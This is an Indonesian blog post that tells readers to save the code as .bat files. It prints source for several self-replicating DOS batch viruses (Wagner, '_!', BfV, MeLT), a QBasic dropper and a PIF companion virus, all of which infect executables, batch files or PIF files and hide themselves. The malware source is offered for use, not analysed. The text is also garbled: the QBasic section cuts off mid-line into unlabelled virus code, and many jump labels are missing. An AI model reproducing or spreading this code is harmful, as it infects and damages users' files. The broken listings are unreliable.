Web Hosting

Indosat Blog Contest (SinyalKuat.co.cc)

Batch Virus Code

Lansung aja ya,,,
semua code dibawah ini copy ke notepad trus save dalam format ".bat"

The Wagner Virus


@echo off

ctty nul

rem ______________________________________________________________

rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf

rem :This virus can be cured simply by typing "attrib -h -r *.*" in

rem :infected directories and deleting BAT files that are identical

rem :to this code, then rename the files having a "V" at the start

rem :to their original names. NOTE: Does not infect COMMAND.COM.

rem :______________________________________________________________

for %%f in (*.exe *.com) do set A=%%f

if %A%==COMMAND.COM set A=

rename %A% V%A%

if not exist V%A% goto end

attrib +h V%A%

copy %0.bat %A%

attrib +r %A%

ren %A% *.bat

set A=


ctty con

@if exist V%0.com V%0.com %1 %2 %3

@if exist V%0.exe V%0.exe %1 %2 %3

----------------------------End of Code----------------------------


Batch virus "_!"


Infects parent and current directories

Virus code is appended to the host batch

Only works if host is in current directory

Infects just one batch unless new clean batches are added

This is a very simple batch virus. When it runs it appends its code

to another batch file in the parent or current directory. It is not

very effective but illustrates the basics.

----------------------------(cut here)------------------------------------

@ctty nul._!

for %%a in (*.bat ..\*.bat) do set _!=%%a

find "_!"<%_!%

if errorlevel 1 find "_!"<0>>%_!%

ctty con._!

----------------------------(cut here)-----------------------------------


Batch virus "BfV"


Creates the hidden file "_BFV" in the root directory of drive C

Infects one batch per run in current and parent directories

Gives up after encountering seven infected batches

Virus code is appended to the host batch

This is an improved appender. It only has to be run from its own directory

once to enable it to reproduce even when the host is in a path directory.

To avoid slowing batch files down too much it exits if it can't infect

after checking seven batch files. If the host batch ends with nul characters

it removes them so the virus code will run.

----------------------------(cut here)------------------------------------

@echo off%[BfV_B]%

if '%1=='## goto BfV_%2

if exist C:\_BfV.bat goto BfV_

if not exist %0.bat goto BfV_end

find "BfV"<0>C:\_BfV.bat

attrib C:\_BfV.bat +h


command /e:5000 /c C:\_BfV ## run

goto BfV_end


for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i

exit BfV


if '%BfV%=='1111111 exit

set BfV=%BfV%1

find "BfV"<3>nul

if not errorlevel 1 goto BfV_end

type %3>BfV

type C:\_BfV.bat>>BfV

move BfV %3>nul

exit BfV


----------------------------(cut here)------------------------------------


Batch virus "MeLT"


Creates the hidden file "MELT_2A" in the temp directory

Infects files in the current, parent and all path directories

Infects one batch per run if less than ten infected files encountered

After detecting ten infected files it displays a graphics screen effect

Adds one line before the host batch and appends the rest

Will not run if attached to AUTOEXEC.BAT (but infects it)

This batch virus is much more advanced. It takes control from the host

immediately, runs the virus then runs the host batch. The host is run in

such a way as to disable the virus until the host is completely finished

to avoid slowing down batch files that call themselves in a loop. Simple

appenders are very obvious when on such files, but this one causes no

significant speed loss except at startup. This virus carries a harmless

payload which is assembled with the debug command - it 'melts' the screen

in a flash of color then returns it to normal before running the host.

----------------------------(cut here)------------------------------------

@if not '%0==' if '%_melt%==' goto meltbeg

::---- dummy host --------

@echo off

echo Hello World!

::---- end dummy host ----

@goto MeLTend [MeLT_2a]


@echo off%_MeLT%

if '%1=='MeLT goto MeLT%2

if not exist %comspec% set comspec=%_MeLT%command

%comspec% /e:5000 /c %0 MeLT vir

set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9

call %0 MeLT rh

set _MeLT=

set MeLTcl=

goto MeLTend


set _MeLT=x

%0 %MeLTcl%


set MeLTH=%0

if not exist %_MeLT%%temp%\nul set temp=%tmp%

if exist %temp%\MeLT_2a goto MeLTrun

%0 MeLT fnd . %path%



if '%2==' exit MeLT

set MeLT=%2\%MeLTH%.bat

if not exist %MeLT% set MeLT=%2\%MeLTH%

if not exist %MeLT% set MeLT=%2%MeLTH%.bat

if not exist %MeLT% set MeLT=%2%MeLTH%

if not exist %MeLT% goto MeLTfnd

find "MeLT"<MeLT>%temp%\MeLT_2a

attrib %temp%\MeLT_2a +h


%MeLTH% MeLT s . .. %path%



if '%2==' exit MeLT

for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a

goto MeLTs


find /i "MeLT"<3>nul

if not errorlevel 1 goto MeLTno

echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t

type %3>>MeLT.t


type %temp%\MeLT_2a>>MeLT.t

move MeLT.t %3>nul

exit MeLT

:MeLTact - flash-melt screen text then put back to normal

echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t

echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t

echo e 120 B4 4C CD 21 00>>MeLT.t

echo g>>MeLT.t


del MeLT.t

exit MeLT


set MeLTC=%MeLTC%1

if %MeLTC%==1111111111 goto MeLTact


----------------------------(cut here)------------------------------------


QBasic virus "BasVir"


Infects one BAS file in the current directory per run

Inserts its code in front of the host so it will run first

Does not infect QBasic programs that contain "DECLARE"

Really a batch virus that hides in BASIC code

If the host is renamed the virus won't work

I wrote this in response to someone's request on the net for a virus

written in BASIC. I hope they don't mind if the BASIC program makes

a batch and runs it. It stays out of programs that use procedures to

avoid causing errors, such programs cannot tolerate prepended code.

This is really a joke, but it's a QBasic virus (no? you write one.)

The following must be named BASVIR.BAS to function.

----------------------------(cut here)------------------------------------

basvirH$ = "BASVIR.BAS"

OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir

PRINT #2, "@echo off %BasVir1%"

PRINT #2, "if '%1=='BasVir goto BasVir%2"

PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a"

PRINT #2, "exit": REM BasVir

PRINT #2, ":BasVir2"

PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<3>nul": REM BasVir

PRINT #2, "if not errorlevel 1 goto BasVirE"

PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir

PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<basvirH>nul

if exist PiFV! del PiFV!

:: run the host

set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9

call %0 PiFV hst

set PiFVo=

set PiFVcl=

:: check for activation...

echo.|date|find /i "sat">nul.PiFV

if errorlevel 1 goto PiFV_end

echo.|time|find "7">nul.PiFV

if errorlevel 1 goto PiFV_msg

set PiFV=echo



%PiFV% There once was an Otter named Oscer

%PiFV% Who claimed to know how to make water.

%PiFV% "No more dams," he said, "use my water instead!"

%PiFV% But the Elder Otter was not impressed.


set PiFV=

goto PiFV_end


echo [PiFV] by WaveFunc

goto PiFV_end


%PiFVo% %PiFVcl%

goto PiFV_end


set PiFVh=%0

if not exist %PiFVh% set PiFVh=%0.bat

if not exist %PiFVh% exit

for %%a in (*.pif) do call %0 PiFV inf %%a

exit PiFV


set PiFVp=%3

:: get victim filename and infection marker

:: from PIF file using debug...

if exist PiFV! goto PiFV_1

echo m 124,162 524>PiFV!

echo e 100 '@set fn='>>PiFV!

echo m 524,562 108>>PiFV!

echo n pifv$.bat>>PiFV!

echo rcx>>PiFV!

echo 47>>PiFV!

echo w>>PiFV!

echo m 55E,561 108>>PiFV!

echo e 10C 0>>PiFV!

echo n pifv$$.bat>>PiFV!

echo rcx>>PiFV!

echo 10>>PiFV!

echo w>>PiFV!

echo q>>PiFV!


debug %PiFVp%<PiFV>nul

call PiFV$

set PiFVn=%fn%

call PiFV$$

set PiFVi=%fn%

del PiFV$?.bat

:: pifvn=orig filename

:: pifvi=infection marker

:: pifvp=pif filename

:: pifvh=companion bat file

:: skip infected or 'empty' pifs...

if '%PiFVi%=='PiFV goto PiFV_end

if '%PiFVn%==' goto PiFV_end

:: don't shadow command.com (be nice)

echo %PiFVn%|find /i "command">nul

if not errorlevel 1 goto PiFV_end

:: infectable - create a companion batch...

:: (the following code strips off the extension)

echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$

echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$

echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$

echo n pifv$.com>>PiFV$$

echo rcx>>PiFV$$

echo 2a>>PiFV$$

echo w>>PiFV$$

echo q>>PiFV$$


echo %PiFVn%|PiFV$>PiFV$$.bat

call PiFV$$

set PiFVb=%fn%.bat

del PiFV$?.*

:: pifvb=new batch name

:: do not shadow if comp has same name as host

if %PiFVo%==%PiFVb% goto PiFV_end

if exist %PiFVb% goto PiFV_end

echo @echo off>%PiFVb%

echo set pifvo=%pifvn%>>%PiFVb%

find "PiFV"<PiFVh>>%PiFVb%

attrib %PiFVb% +h

:: ...and point the PIF at the companion

echo e 15E 'PiFV',0>PiFV$$

echo e 124 '%PiFVb%',0>>PiFV$$

echo w>>PiFV$$

echo q>>PiFV$$

debug %PiFVp%<PiFV>nul

del PiFV$$

:: I think we're done!

exit PiFV


:: wonder how many bugs all this has in it? Only one

:: way to find out...

Baca Yang Ini Juga Ya :

Posted in Label: |

0 komentar:

Posting Komentar